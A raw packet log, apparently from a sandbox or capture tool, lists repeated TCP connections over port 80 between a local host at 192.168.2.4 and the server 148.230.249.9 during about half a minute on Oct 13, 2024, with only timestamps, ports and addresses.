Oct 13, 2024 18:27:44.344046116 CEST	80	64968	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:44.344127893 CEST	80	64968	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:45.302810907 CEST	80	64968	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:45.303859949 CEST	80	64968	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:45.303930998 CEST	64968	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:45.307379007 CEST	64968	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:45.312424898 CEST	80	64968	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:45.322740078 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:45.328291893 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:45.328598022 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:45.331068039 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:45.331068039 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:45.335994959 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:45.336071968 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.963160038 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.963207006 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.963236094 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.963268042 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.963293076 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.963293076 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.963397980 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.967463017 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.967504978 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.967544079 CEST	64969	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.970889091 CEST	64970	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.972407103 CEST	80	64969	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.976089001 CEST	80	64970	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.976293087 CEST	64970	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.976579905 CEST	64970	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.976579905 CEST	64970	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:46.981838942 CEST	80	64970	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:46.981878042 CEST	80	64970	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:47.918625116 CEST	80	64970	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:47.919682026 CEST	80	64970	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:47.919754982 CEST	64970	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:47.919815063 CEST	64970	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:47.922821045 CEST	64971	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:47.924977064 CEST	80	64970	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:47.927870989 CEST	80	64971	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:47.928205967 CEST	64971	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:47.928205967 CEST	64971	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:47.929371119 CEST	64971	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:47.933600903 CEST	80	64971	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:47.934279919 CEST	80	64971	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:48.893680096 CEST	80	64971	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:48.894534111 CEST	80	64971	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:48.894639015 CEST	64971	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:48.896545887 CEST	64971	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:48.901724100 CEST	80	64971	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:48.927881956 CEST	64972	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:48.932904959 CEST	80	64972	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:48.933026075 CEST	64972	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:48.933195114 CEST	64972	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:48.933260918 CEST	64972	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:48.938105106 CEST	80	64972	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:48.938158989 CEST	80	64972	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:49.898473024 CEST	80	64972	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:49.898525000 CEST	80	64972	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:49.898590088 CEST	64972	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:49.898884058 CEST	64972	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:49.903760910 CEST	80	64972	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:49.905847073 CEST	64973	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:49.911154985 CEST	80	64973	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:49.911473036 CEST	64973	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:49.911473989 CEST	64973	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:49.911564112 CEST	64973	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:49.916601896 CEST	80	64973	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:49.916651964 CEST	80	64973	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:50.853787899 CEST	80	64973	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:50.854746103 CEST	80	64973	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:50.854819059 CEST	64973	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:50.854877949 CEST	64973	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:50.858681917 CEST	64974	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:50.859802008 CEST	80	64973	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:50.863645077 CEST	80	64974	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:50.863720894 CEST	64974	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:50.863857985 CEST	64974	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:50.863874912 CEST	64974	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:50.868678093 CEST	80	64974	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:50.868818998 CEST	80	64974	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:51.826019049 CEST	80	64974	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:51.827100992 CEST	80	64974	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:51.827442884 CEST	64974	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:51.827442884 CEST	64974	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:51.830374002 CEST	64975	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:51.832489014 CEST	80	64974	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:51.835539103 CEST	80	64975	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:51.835630894 CEST	64975	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:51.835762024 CEST	64975	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:51.835762978 CEST	64975	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:51.840539932 CEST	80	64975	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:51.840759039 CEST	80	64975	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:52.776384115 CEST	80	64975	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:52.778186083 CEST	80	64975	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:52.778260946 CEST	64975	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:52.778408051 CEST	64975	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:52.783457041 CEST	80	64975	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:52.784629107 CEST	64976	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:52.789630890 CEST	80	64976	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:52.789715052 CEST	64976	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:52.789835930 CEST	64976	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:52.789871931 CEST	64976	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:52.794759989 CEST	80	64976	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:52.794789076 CEST	80	64976	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:53.737190962 CEST	80	64976	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:53.738106966 CEST	80	64976	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:53.738200903 CEST	64976	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:53.738276958 CEST	64976	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:53.742254019 CEST	64977	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:53.743436098 CEST	80	64976	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:53.747360945 CEST	80	64977	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:53.747476101 CEST	64977	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:53.747736931 CEST	64977	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:53.747826099 CEST	64977	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:53.752556086 CEST	80	64977	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:53.752806902 CEST	80	64977	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:54.709198952 CEST	80	64977	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:54.709252119 CEST	80	64977	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:54.709328890 CEST	64977	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:54.709528923 CEST	64977	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:54.714521885 CEST	80	64977	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:54.715270042 CEST	64978	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:54.720423937 CEST	80	64978	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:54.720614910 CEST	64978	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:54.720984936 CEST	64978	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:54.720984936 CEST	64978	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:54.726246119 CEST	80	64978	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:54.726284981 CEST	80	64978	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:55.663595915 CEST	80	64978	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:55.663693905 CEST	80	64978	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:55.664114952 CEST	64978	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:55.664482117 CEST	64978	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:55.667546988 CEST	64979	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:55.669501066 CEST	80	64978	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:55.672902107 CEST	80	64979	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:55.673187971 CEST	64979	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:55.673388004 CEST	64979	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:55.673423052 CEST	64979	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:55.678523064 CEST	80	64979	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:55.678551912 CEST	80	64979	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:56.622756004 CEST	80	64979	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:56.623907089 CEST	80	64979	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:56.624120951 CEST	64979	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:56.624121904 CEST	64979	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:56.627789021 CEST	64981	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:56.629053116 CEST	80	64979	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:56.633394003 CEST	80	64981	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:56.633800030 CEST	64981	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:56.633893013 CEST	64981	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:56.633893013 CEST	64981	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:56.638823986 CEST	80	64981	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:56.638865948 CEST	80	64981	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:57.589418888 CEST	80	64981	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:57.590377092 CEST	80	64981	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:57.590519905 CEST	64981	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:57.590631962 CEST	64981	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:57.594156027 CEST	64987	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:57.596261024 CEST	80	64981	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:57.600029945 CEST	80	64987	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:57.600227118 CEST	64987	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:57.600322008 CEST	64987	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:57.600322008 CEST	64987	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:57.605448008 CEST	80	64987	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:57.605752945 CEST	80	64987	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:58.543081999 CEST	80	64987	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:58.543134928 CEST	80	64987	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:58.543210030 CEST	64987	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:58.543427944 CEST	64987	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:58.546967983 CEST	64993	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:58.548624992 CEST	80	64987	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:58.552083015 CEST	80	64993	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:58.552161932 CEST	64993	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:58.552355051 CEST	64993	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:58.552355051 CEST	64993	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:58.557485104 CEST	80	64993	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:58.557537079 CEST	80	64993	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:59.554004908 CEST	80	64993	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:59.557687044 CEST	80	64993	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:59.558358908 CEST	64993	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:59.558458090 CEST	64993	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:59.563669920 CEST	80	64993	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:59.569158077 CEST	64999	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:59.574127913 CEST	80	64999	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:59.575916052 CEST	64999	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:59.576095104 CEST	64999	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:59.576131105 CEST	64999	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:27:59.581012964 CEST	80	64999	148.230.249.9	192.168.2.4
Oct 13, 2024 18:27:59.581042051 CEST	80	64999	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:00.520693064 CEST	80	64999	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:00.521313906 CEST	80	64999	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:00.521490097 CEST	64999	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:00.521490097 CEST	64999	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:00.525887012 CEST	65005	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:00.526396036 CEST	80	64999	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:00.530810118 CEST	80	65005	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:00.530884981 CEST	65005	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:00.531119108 CEST	65005	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:00.531119108 CEST	65005	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:00.536029100 CEST	80	65005	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:00.536241055 CEST	80	65005	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:01.491563082 CEST	80	65005	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:01.492470980 CEST	80	65005	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:01.500523090 CEST	65005	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:01.500610113 CEST	65005	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:01.504095078 CEST	65016	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:01.505594015 CEST	80	65005	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:01.509320021 CEST	80	65016	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:01.509593964 CEST	65016	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:01.509685040 CEST	65016	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:01.509685040 CEST	65016	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:01.514688969 CEST	80	65016	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:01.514992952 CEST	80	65016	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:02.469595909 CEST	80	65016	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:02.470587015 CEST	80	65016	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:02.470685005 CEST	65016	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:02.472939014 CEST	65016	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:02.477936029 CEST	80	65016	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:02.670990944 CEST	65022	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:02.677385092 CEST	80	65022	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:02.677472115 CEST	65022	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:02.677640915 CEST	65022	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:02.677666903 CEST	65022	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:02.682852030 CEST	80	65022	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:02.682882071 CEST	80	65022	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:03.625276089 CEST	80	65022	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:03.627130985 CEST	80	65022	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:03.627242088 CEST	65022	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:03.627324104 CEST	65022	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:03.629564047 CEST	65028	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:03.633361101 CEST	80	65022	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:03.634588957 CEST	80	65028	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:03.634689093 CEST	65028	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:03.634772062 CEST	65028	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:03.634807110 CEST	65028	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:03.639683962 CEST	80	65028	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:03.640933037 CEST	80	65028	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:04.591512918 CEST	80	65028	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:04.593071938 CEST	80	65028	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:04.593153954 CEST	65028	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:04.593211889 CEST	65028	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:04.595581055 CEST	65034	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:04.599550962 CEST	80	65028	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:04.602621078 CEST	80	65034	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:04.602715969 CEST	65034	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:04.602816105 CEST	65034	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:04.602850914 CEST	65034	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:04.607774973 CEST	80	65034	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:04.607805967 CEST	80	65034	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:05.563189983 CEST	80	65034	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:05.564156055 CEST	80	65034	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:05.564244986 CEST	65034	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:05.564326048 CEST	65034	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:05.567614079 CEST	65046	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:05.569468975 CEST	80	65034	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:05.572645903 CEST	80	65046	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:05.572738886 CEST	65046	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:05.572858095 CEST	65046	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:05.572884083 CEST	65046	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:05.578213930 CEST	80	65046	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:05.578257084 CEST	80	65046	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:06.520082951 CEST	80	65046	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:06.520153999 CEST	80	65046	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:06.520404100 CEST	65046	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:06.520405054 CEST	65046	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:06.522823095 CEST	65052	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:06.525418997 CEST	80	65046	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:06.527791977 CEST	80	65052	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:06.529058933 CEST	65052	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:06.529167891 CEST	65052	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:06.529226065 CEST	65052	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:06.534014940 CEST	80	65052	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:06.534188986 CEST	80	65052	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:07.527420044 CEST	80	65052	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:07.527539015 CEST	80	65052	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:07.527667999 CEST	65052	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:07.544464111 CEST	65052	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:07.550980091 CEST	80	65052	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:07.592680931 CEST	65058	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:07.597636938 CEST	80	65058	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:07.600336075 CEST	65058	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:07.604176044 CEST	65058	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:07.604176044 CEST	65058	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:07.609595060 CEST	80	65058	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:07.609627008 CEST	80	65058	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:08.549442053 CEST	80	65058	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:08.550466061 CEST	80	65058	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:08.550642967 CEST	65058	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:08.551187992 CEST	65058	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:08.553847075 CEST	65064	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:08.556096077 CEST	80	65058	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:08.558968067 CEST	80	65064	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:08.561141968 CEST	65064	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:08.561347961 CEST	65064	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:08.561381102 CEST	65064	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:08.566235065 CEST	80	65064	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:08.566396952 CEST	80	65064	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:09.502774000 CEST	80	65064	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:09.503849983 CEST	80	65064	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:09.504054070 CEST	65064	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:09.504054070 CEST	65064	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:09.507870913 CEST	65070	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:09.509027004 CEST	80	65064	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:09.512835026 CEST	80	65070	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:09.512912035 CEST	65070	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:09.548398018 CEST	65070	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:09.548398018 CEST	65070	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:09.553726912 CEST	80	65070	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:09.553765059 CEST	80	65070	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:10.463885069 CEST	80	65070	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:10.464965105 CEST	80	65070	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:10.465257883 CEST	65070	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:10.465357065 CEST	65070	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:10.467438936 CEST	65080	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:10.470698118 CEST	80	65070	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:10.472448111 CEST	80	65080	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:10.476519108 CEST	65080	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:10.477514029 CEST	65080	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:10.477514029 CEST	65080	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:10.482857943 CEST	80	65080	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:10.482887983 CEST	80	65080	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:11.447698116 CEST	80	65080	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:11.447735071 CEST	80	65080	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:11.447931051 CEST	65080	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:11.448312044 CEST	65080	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:11.452414989 CEST	65082	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:11.457897902 CEST	80	65080	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:11.458045959 CEST	80	65082	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:11.458132029 CEST	65082	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:11.458384037 CEST	65082	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:11.458384037 CEST	65082	80	192.168.2.4	148.230.249.9
Oct 13, 2024 18:28:11.463422060 CEST	80	65082	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:11.463454008 CEST	80	65082	148.230.249.9	192.168.2.4
Oct 13, 2024 18:28:12.403850079 CEST	80	65082	148.230.249.9	192.168.2.4
